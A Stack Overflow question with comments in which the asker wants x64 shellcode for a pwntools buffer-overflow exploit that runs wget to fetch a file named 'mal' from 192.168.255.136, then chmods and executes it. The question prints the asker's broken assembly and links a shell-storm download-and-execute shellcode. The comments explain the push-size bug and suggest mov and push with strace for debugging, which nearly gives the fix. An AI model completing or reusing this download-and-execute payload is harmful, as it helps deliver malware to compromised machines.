0

The problem is based on linux/x64 asm wget+chmod+exec

I have some questions to ask I am using pwntool for buffer overflow attack, I want to stuff the shellcode in the stack for him to run, I tested using execve("/bin/sh') and I can get the shell successfully, but now I want him to download the malware from external host, for example 192.168.255.136/mal and download After downloading, give him execute permission to chmod 777 mal and finally execute him . /mal

I tried to write wget to download external files but there is no request

The wget asm I tried to write is as follows

_start:
    xor eax, eax
    mov rax 0x39
    syscall

    xor rbx, rbx
    cmp rax, rbx
    je child

child:
    xor rax, rax
    push rax

    push 0x6c616d2f
    push 0x2f363331
    push 0x2e353532
    push 0x2e383631
    push 0x2e323931
    mov rsi, rsp

    push 0x74
    push 0x6567772f
    push 0x6e69622f
    push 0x7273752f
    mov rdi, rsp

    push rax 
    push rsi 
    push rdi 
    mov rsi, rsp 

    mov eax, 0x3b  
    xor rdx, rdx 
    syscall

this is my modified it by referring to shellstorm's x86 download+chmod+exec, but it failed

source : https://shell-storm.org/shellcode/files/shellcode-862.html

Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
0xbe61a55f
  • 3
  • 3
  • You know `push imm32` is an 8-byte push, right? The immediate is zero-extended to 64-bit. If that's supposed to be string data, there will be gaps of 4 `0` bytes between each 4-byte chunk, as you can see if you single-step with a debugger and examine memory. Probably you wanted `mov rsi, 0x6c616d2f2f363331` / `push rsi` and similar for the next 2 chunks, to push a total of 16 bytes of string data? Also, this is NASM syntax, you can write stuff like `mov rsi, 'hello wo'` instead of manually using the hex bit-patterns. – Peter Cordes May 25 '23 at 04:48
  • Also, `strace ./a.out` is another important debugging tool to trace what systems calls you make, and decode the actual args you passed. – Peter Cordes May 25 '23 at 04:50
  • Near duplicates: [How many bytes does the push instruction push onto the stack when I don't specify the operand size?](https://stackoverflow.com/q/45127993) and [How to push a 64bit int in NASM?](https://stackoverflow.com/q/16917643) – Peter Cordes May 25 '23 at 04:55

0 Answers0